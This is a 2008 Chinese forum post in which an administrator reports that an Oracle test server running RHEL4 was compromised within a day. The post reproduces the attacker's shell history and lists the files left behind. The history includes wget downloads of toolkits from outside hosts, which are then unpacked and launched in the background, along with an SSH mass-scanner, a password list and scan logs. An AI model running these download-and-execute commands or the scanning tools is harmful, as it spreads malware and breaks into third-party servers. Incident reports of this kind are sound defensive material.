1天时间没有到RH4被人入侵

[Copy to clipboard] [ - ]CODE:lsnrctl status
ls
vi start.sh
eixt
exit
lsnrctl start
sqlplus /nolog
exit
w
ps x
cat /proc/cpuinfo
passwd
passwd
cd /var/tmp
wget [url]http://gabr1el.at.ua/Gaby.tgz[/url]
tar xzvf Gaby.tgz
cd ssh
chmod +x *
nohup ./mass 218 >>/dev/null &
ps x
nohup ./start 218 >>/dev/null &
ps x
cd /var/tmp
wget [url]http://gabr1el.at.ua/Gaby.tgz[/url]
tar xzvf Gaby.tgz
cd ssh
chmod +x *
nohup ./mass 203 >>/dev/null &
ps x
cd /dev/shm
cd bengos
nohup ./start 218 >>/dev/null &
cd /de/shm
ls -a
cd /dev/shm
ls -a
cd /var/tmp
ls -a
cd /var/tmp
wget [url]www.parazitul.us/p/bengos.tgz[/url]
tar xzvf bengos.tgz
cd bengos
chmod +x *
nohup ./start 218 >>/dev/null &
ps x
cd /dev/shm
wget [url]www.parazitul.us/p/bengos.tgz[/url]
tar xzvf bengos.tgz
cd bengos
chmod +x *
nohup ./start 218 >>/dev/null &
cd /var/tmp
wget [url]www.parazitul.us/p/bengos.tgz[/url]
tar xzvf bengos.tgz
cd bengos
chmod +x *
nohup ./start 218 >>/dev/null &
ps x
cd /var/tmp
cd ssh
cat vuln.txt
w
ps x
cd /dev/shm
ls -a
cd bengos
tar xzvf bengos.tgz
cd bengos
chmod +x *
cd /var/tmp
ls -a
cd bengos
ls -a
cd ..
cd ssh
cat vuln.txt
whereis a
ls
ls
ls
cd ~
ls
cat sqlnet.log
ps -ax |grep ora
exit
该服务器是客户的临时测试JSP+oracle服务器。放我机房映射出去22和8088
没有到1天的时间就用oracle用户登陆服务器给入侵了。
可相而知linux……
也许补丁太多的rh4没有升级完的过。但默认安装都这样……为客户默哀……为客户的网管默哀



Z~B[G.jpg (146.34 KB) 2008-4-26 14:19
 

last.jpg (40.86 KB) 2008-4-26 14:19
 

---

[Copy to clipboard] [ - ]CODE:[root@localhost tmp]# ll
total 2220
drwx------  2 oracle oinstall   4096 Apr 26 14:02 bengos
-rw-r--r--  1 oracle oinstall 822083 Oct 14  2007 bengos.tgz
drwxr-xr-x  2 root   root       4096 Apr 23 20:20 firstboot
-rwxr-xr-x  1 oracle oinstall 698012 Apr 16 08:46 Gaby.tgz
-rwxr-xr-x  1 oracle oinstall 698012 Apr 16 08:46 Gaby.tgz.1
drwxr-xr-x  2 oracle oinstall   4096 Apr 26 14:00 ssh
[root@localhost tmp]#


[Copy to clipboard] [ - ]CODE:[root@localhost tmp]# ll
total 2220
drwx------  2 oracle oinstall   4096 Apr 26 14:02 bengos
-rw-r--r--  1 oracle oinstall 822083 Oct 14  2007 bengos.tgz
drwxr-xr-x  2 root   root       4096 Apr 23 20:20 firstboot
-rwxr-xr-x  1 oracle oinstall 698012 Apr 16 08:46 Gaby.tgz
-rwxr-xr-x  1 oracle oinstall 698012 Apr 16 08:46 Gaby.tgz.1
drwxr-xr-x  2 oracle oinstall   4096 Apr 26 14:00 ssh
[root@localhost tmp]# cd ssh/
[root@localhost ssh]# ls
a  mass  nobash.txt  pass.txt  pscan2  pscan2.c  scan  scan.log  sshd  vuln.txt
[root@localhost ssh]# ll
total 1716
-rwxr-xr-x  1 oracle oinstall     307 Jul 29  2005 a
-rwxr-xr-x  1 oracle oinstall    2893 Nov  4  2006 mass
-rwxr-xr-x  1 oracle oinstall    4815 Dec 13  2005 nobash.txt
-rwxr-xr-x  1 oracle oinstall  273836 Dec 18  2005 pass.txt
-rwxr-xr-x  1 oracle oinstall    5944 May 15  2005 pscan2
-rwxr-xr-x  1 oracle oinstall    5797 May 15  2005 pscan2.c
-rwxr-xr-x  1 oracle oinstall     307 Jul 29  2005 scan
-rw-r--r--  1 oracle oinstall      15 Apr 26 14:05 scan.log
-rwxr-xr-x  1 oracle oinstall 1384518 Jun  5  2005 sshd
-rwxr-xr-x  1 oracle oinstall     106 Dec 12  2005 vuln.txt TAG标签 : 入侵 没有 时间 connlist cd oracle if oinstall ssh